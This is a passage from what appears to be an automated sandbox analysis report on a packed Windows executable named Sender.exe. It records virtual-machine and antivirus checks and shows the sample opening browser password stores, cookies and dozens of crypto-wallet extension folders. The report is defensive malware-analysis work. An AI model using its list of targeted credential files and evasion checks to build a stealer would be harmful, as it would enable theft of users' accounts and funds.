      Source: C:\Users\user\Desktop\Sender.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: Sender.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Sender.exeStatic PE information: section name: UPX2
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006CF60C push BEC42319h; ret 0_3_006CF623
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006EC260 pushad ; retn 006Eh0_3_006EC261
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006EC260 pushad ; retn 006Eh0_3_006EC261
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006EC254 push eax; retn 006Eh0_3_006EC255
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006EC254 push eax; retn 006Eh0_3_006EC255
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006EC250 push eax; retn 006Eh0_3_006EC251
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006EC250 push eax; retn 006Eh0_3_006EC251
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006ECEE5 push 5D006F00h; retn 006Bh0_3_006ECF09
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006ECEE5 push 5D006F00h; retn 006Bh0_3_006ECF09
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_00685EC0 pushfd ; ret 0_3_006866E1
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_00685EC0 pushfd ; ret 0_3_006866E1
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_00685EC0 pushfd ; ret 0_3_006866E1
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_0067BFE8 pushad ; retf 0_3_0067C025
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_0067BFE8 pushad ; retf 0_3_0067C025
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_0067BFE8 pushad ; retf 0_3_0067C025
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006ECEE5 push 5D006F00h; retn 006Bh0_3_006ECF09
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006ECEE5 push 5D006F00h; retn 006Bh0_3_006ECF09
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006EC260 pushad ; retn 006Eh0_3_006EC261
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006EC260 pushad ; retn 006Eh0_3_006EC261
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006EC254 push eax; retn 006Eh0_3_006EC255
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006EC254 push eax; retn 006Eh0_3_006EC255
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006EC250 push eax; retn 006Eh0_3_006EC251
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006EC250 push eax; retn 006Eh0_3_006EC251
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006CF60C push BEC42319h; ret 0_3_006CF623
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_00685EC0 pushfd ; ret 0_3_006866E1
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_00685EC0 pushfd ; ret 0_3_006866E1
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_00685EC0 pushfd ; ret 0_3_006866E1
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_0067BFE8 pushad ; retf 0_3_0067C025
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_0067BFE8 pushad ; retf 0_3_0067C025
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_0067BFE8 pushad ; retf 0_3_0067C025
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_00685EC0 pushfd ; ret 0_3_006866E1
      Source: initial sampleStatic PE information: section name: UPX0
      Source: initial sampleStatic PE information: section name: UPX1
      Source: C:\Users\user\Desktop\Sender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\Sender.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
      Source: C:\Users\user\Desktop\Sender.exeSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Users\user\Desktop\Sender.exe TID: 5828Thread sleep time: -180000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: Sender.exe, Sender.exe, 00000000.00000003.1172667613.0000000000685000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1291043267.0000000000685000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290555834.000000000063A000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278704674.0000000000685000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291724046.000000000063A000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1244133244.0000000000685000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1232012397.0000000000685000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291853008.0000000000685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\Sender.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: Sender.exe, Sender.exe, 00000000.00000003.1290555834.0000000000657000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1244133244.000000000066B000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278664144.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291970435.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1244133244.0000000000657000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291751130.0000000000657000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1244329854.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290417095.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1291117129.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278704674.0000000000657000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1251834541.00000000006E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
      Source: C:\Users\user\Desktop\Sender.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 0.2.Sender.exe.a00000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000000.00000002.1292268043.0000000000A01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdliaogehgdbhbnmkklieghmmjkpigpaJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
